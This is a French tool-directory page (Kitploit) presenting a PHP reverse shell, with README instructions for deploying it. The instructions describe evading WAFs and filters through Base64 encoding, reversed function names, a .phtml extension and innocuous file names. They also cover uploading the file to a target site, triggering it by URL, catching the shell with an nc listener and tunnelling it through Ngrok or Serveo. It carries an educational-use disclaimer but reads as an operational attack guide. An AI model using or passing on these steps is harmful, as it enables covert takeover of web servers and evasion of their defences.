Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PHP-REVERSE-SHELL — Ceci est un shell inversé PHP puissant et furtif conçu pour le hacking éthique et les tests de pénétration. Il établit une connexion fiable et silencieuse vers votre machine. | Kitploit
Outils/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Génération de PayloadsÉvasion IDS/IPSExploitation d'Applications WebContournement de WAFTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingOutil d'Accès à Distance

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

Ceci est un shell inversé PHP puissant et furtif conçu pour le hacking éthique et les tests de pénétration. Il établit une connexion fiable et silencieuse vers votre machine.

Voir le dépôt
1il y a 11 moisPas encore vérifié

PHP Reverse Shell (Puissant et Furtif)

Ceci est un reverse shell PHP puissant et furtif conçu pour le hacking éthique et les tests de pénétration. Il établit une connexion fiable et discrète vers votre machine.

⚠️ Avertissement

Ce reverse shell PHP est développé strictement à des fins éducatives et de tests de pénétration autorisés uniquement.
Le développeur n'est pas responsable de toute utilisation abusive, des dommages ou de toute activité illégale effectuée à l'aide de ce reverse_shell.
Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. L'accès non autorisé est illégal et puni par la loi.

Fonctionnalités

  • L'IP et la commande shell sont encodés en Base64 pour plus de discrétion

  • Les noms de fonctions sont inversés pour contourner les WAF et les filtres de sécurité

  • Mode silencieux — aucune sortie affichée pour éviter la détection

  • Se reconnecte automatiquement si la connexion est interrompue

  • Peut s'exécuter en tant que démon en arrière-plan (si le serveur le permet)

  • Fonctionne sur la plupart des serveurs supportant PHP

  • Prend en charge les services de tunneling comme Ngrok, Serveo

  • Téléchargement avec l'extension .phtml pour contourner certains filtres

Comment utiliser

1. Démarrez un écouteur sur votre machine

root@kitploit:~
nc -lvnp 4444

2. Encodez votre IP ou nom d'hôte en Base64

Utilisez cette commande simple :

root@kitploit:~
echo "your_ip_or_hostname" | base64

Exemple :

root@kitploit:~
echo "192.168.1.5" | base64

Copiez la sortie et remplacez la valeur de $ip_b64 dans le script reverse shell PHP.

3. Mettez à jour votre script reverse shell PHP :

Modifiez ces lignes avec votre IP/hôte encodé en Base64 et votre port :

root@kitploit:~
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;

4. Renommez le fichier et téléchargez-le

Renommez le fichier pour le rendre moins suspect, par exemple :

  • login.phtml

  • avatar.phtml

  • update.phtml

L'utilisation de l'extension .phtml permet au fichier de s'exécuter sur certains serveurs qui bloquent le .php.

Téléchargez ce fichier sur le site cible où les téléchargements de fichiers sont autorisés.

5. Déclenchez le reverse shell

Ouvrez le fichier téléchargé dans un navigateur :

root@kitploit:~
http://target.com/uploads/login.phtml

Une fois ouvert, votre écouteur recevra une connexion reverse shell.

Utiliser le tunneling (quand votre IP n'est pas publique)

Si vous utilisez des données mobiles ou êtes derrière un routeur (NAT), votre IP pourrait ne pas être publique. Dans ce cas, le reverse shell ne peut pas atteindre votre machine directement.

Pour résoudre cela, utilisez des outils de tunneling TCP comme Ngrok ou Serveo.

Ngrok (Recommandé)

Installez Ngrok
Exécutez cette commande :

root@kitploit:~
ngrok tcp 4444

Cela affichera quelque chose comme :

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

Mettez à jour votre script reverse shell PHP :

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

Démarrez votre écouteur :

root@kitploit:~
nc -lvnp 4444

Serveo

Exécutez cette commande :

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

Cela affichera quelque chose comme :

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

Mettez à jour votre script reverse shell PHP :

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

Démarrez votre écouteur :

root@kitploit:~
nc -lvnp 4444

Licence

Ce projet est distribué sous la licence GNU General Public License v3.0

Télécharger l’outil